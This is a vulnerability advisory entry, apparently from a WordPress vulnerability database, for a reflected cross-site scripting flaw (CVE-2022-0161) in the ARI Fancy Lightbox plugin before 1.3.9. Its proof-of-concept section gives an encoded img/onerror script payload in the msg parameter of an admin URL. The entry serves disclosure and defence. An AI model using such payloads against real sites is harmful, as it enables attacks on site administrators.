WordPress Plugin Vulnerabilities

ARI Fancy Lightbox < 1.3.9 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape the msg parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting

Proof of Concept

https://example.com/wp-admin/admin.php?page=ari-fancy-lightbox&msg=%3Cimg+src+onerror%3Dalert%28/XSS/%29%3E

Affects Plugins

Plugin icon
ari-fancy-lightbox
Fixed in 1.3.9

References

CVE
CVE-2022-0161
URL
https://plugins.trac.wordpress.org/changeset/2680993

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
https://kazet.cc/
Verified
Yes
WPVDB ID
6b37fa17-0dcb-47a7-b1eb-f9f6abb458c0

Timeline

Publicly Published
2022-02-17 (about 2 years ago)
Added
2022-02-17 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)

Other

Published
Title
Published
2022-05-09
Title
External Links in New Window / New Tab < 1.43 - Unauthenticated Stored Cross-Site Scripting
Published
2022-08-31
Title
Simple Bitcoin Faucets <= 1.7.0 - Unauthorised AJAX Call to Stored XSS
Published
2024-04-09
Title
Premium Addons for Elementor < 4.10.17 - Contributor+ Stored Cross-Site Scripting via Wrapper Link Widget
Published
2014-08-01
Title
ShrimpTest 1.0b2 - plugins/metric-conversion.php Multiple Unspecified XSS
Published
2023-07-26
Title
AGP Font Awesome Collection <= 3.2.4 - Reflected XSS